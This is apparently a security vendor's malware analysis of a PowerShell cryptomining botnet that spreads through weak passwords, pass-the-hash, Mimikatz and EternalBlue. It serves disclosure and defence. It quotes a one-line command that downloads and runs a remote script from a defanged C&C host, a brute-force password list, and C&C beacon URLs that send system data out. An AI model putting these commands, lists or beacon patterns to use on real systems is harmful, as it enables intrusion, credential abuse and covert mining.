We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.
It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.
Propagation and Behavior
The malware’s (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network. Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with
IEX (New-Object Net.WebClient).downloadstring('hxxp://v.beahh[.]com/wm?hp')
123456 password PASSWORD football welcome 1 12 21 123 321 1234 12345 123123 123321 111111 654321 666666 121212 000000 222222 888888 |
1111 555555 1234567 12345678 123456789 987654321 admin abc123 abcd1234 abcd@1234 abc@123 p@ssword P@ssword p@ssw0rd P@ssw0rd P@SSWORD P@SSW0RD P@$$w0rd P@$$word P@$$w0rd iloveyou |
monkey login passw0rd master hello qazwsx password1 qwerty baseball qwertyuiop superman 1qaz2wsx fuckyou 123qwe zxcvbn pass aaaaaa love administrator |
Table 1. List of weak passwords used for primary propagation
It also uses this list with Invoke-WMIMethod to gain remote access to other machines:
Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords
The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.
Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords
If successful, it deletes the file %Start Menu%\Programs\Startup\run.bat, likely a dropped file of an older version of the malware. It also drops the following:
- %Application Data%\flashplayer.tmp
- %Application Data%\sign.txt - used to indicate that the machine is already infected
- %Start Menu%\Programs\Startup\FlashPlayer.lnk - responsible for executing the flashplayer.tmp script
If the user has a stronger password, the malware uses EternalBlue to propagate.
Figure 3. Exploit payload
Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.
Figure 4. Routine for acquiring the MAC address and AV products installed by the malware
To check whether the malware already installed its components it looks for the following files:
- %Temp%\kkk1.log
- %Temp%\pp2.log
- %Temp%\333.log
- %Temp%\kk4.log
- %Temp%\kk5.log
Figure 5. Checking for installed malware components
With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and installs a scheduled task to run it regularly if it is still unset. The behavior of the malware depends on the privilege it was run. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.
Figure 6. $flag and $flag2 for scheduled tasks
The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:
- Computer Name
- Machine's GUID
- MAC Address
- OS Version
- Graphics Memory Information
- System Time
The fourth component is a Python-compiled binary executable (detected by Trend Micro as HackTool.Win32.Impacket.AI) that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).
Figure 7. Dropping the fourth executable component
Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz
The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.
Figure 9. Scanning for machines vulnerable to EternalBlue exploit
The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.
The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.
Figure 10. PowerShell script that downloads and executes the miner payload
Figure 11. Executing the miner payload
We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these. And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.
Figure 12. Malware’s new URL
We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords, and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.
Indicators of Compromise
SHA256 | Detection |
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 | Trojan.PS1.MIMIKATZ.ADW |
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e | Trojan.PS1.LUDICROUZ.A |
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 | TrojanSpy.Win32.BEAHNY.THCACAI |
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 | Trojan.PS1.PCASTLE.B |
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 | HackTool.Win32.Impacket.AI |
hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}